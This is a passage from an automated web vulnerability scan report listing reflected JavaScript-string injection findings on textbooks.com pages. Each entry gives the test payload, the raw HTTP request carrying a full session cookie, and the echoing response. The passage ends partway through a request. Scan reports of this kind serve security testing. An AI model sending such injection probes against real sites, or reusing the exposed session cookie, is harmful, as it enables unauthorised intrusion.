Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:07 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/B/ce618';e2864f06855'

</script>
...[SNIP]...

1.10. http://www.textbooks.com/Catalog/C/Communication-and-Media.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/C/Communication-and-Media.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75dad'%3b481a0315a4c was submitted in the REST URL parameter 1. This input was echoed as 75dad';481a0315a4c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog75dad'%3b481a0315a4c/C/Communication-and-Media.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3653
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:00 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog75dad';481a0315a4c/C/Communication-and-Media.php'

</script>
...[SNIP]...

1.11. http://www.textbooks.com/Catalog/C/Communication-and-Media.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/C/Communication-and-Media.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 538e3'%3bf010126a56c was submitted in the REST URL parameter 3. This input was echoed as 538e3';f010126a56c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/C/538e3'%3bf010126a56c HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:01 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/C/538e3';f010126a56c'

</script>
...[SNIP]...

1.12. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/D/Computer-Science-and-Technology.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cb83'%3bcd802c1acb8 was submitted in the REST URL parameter 1. This input was echoed as 1cb83';cd802c1acb8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog1cb83'%3bcd802c1acb8/D/Computer-Science-and-Technology.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3661
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog1cb83';cd802c1acb8/D/Computer-Science-and-Technology.php'

</script>
...[SNIP]...

1.13. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/D/Computer-Science-and-Technology.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccc1'%3bf35221d84d8 was submitted in the REST URL parameter 3. This input was echoed as 4ccc1';f35221d84d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/D/4ccc1'%3bf35221d84d8 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/D/4ccc1';f35221d84d8'

</script>
...[SNIP]...

1.14. http://www.textbooks.com/Catalog/E/Education.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/E/Education.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e0c5'%3b8fe95fbd68d was submitted in the REST URL parameter 1. This input was echoed as 4e0c5';8fe95fbd68d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog4e0c5'%3b8fe95fbd68d/E/Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3639
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog4e0c5';8fe95fbd68d/E/Education.php'

</script>
...[SNIP]...

1.15. http://www.textbooks.com/Catalog/E/Education.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/E/Education.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5082c'%3be6f007d707 was submitted in the REST URL parameter 3. This input was echoed as 5082c';e6f007d707 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/E/5082c'%3be6f007d707 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
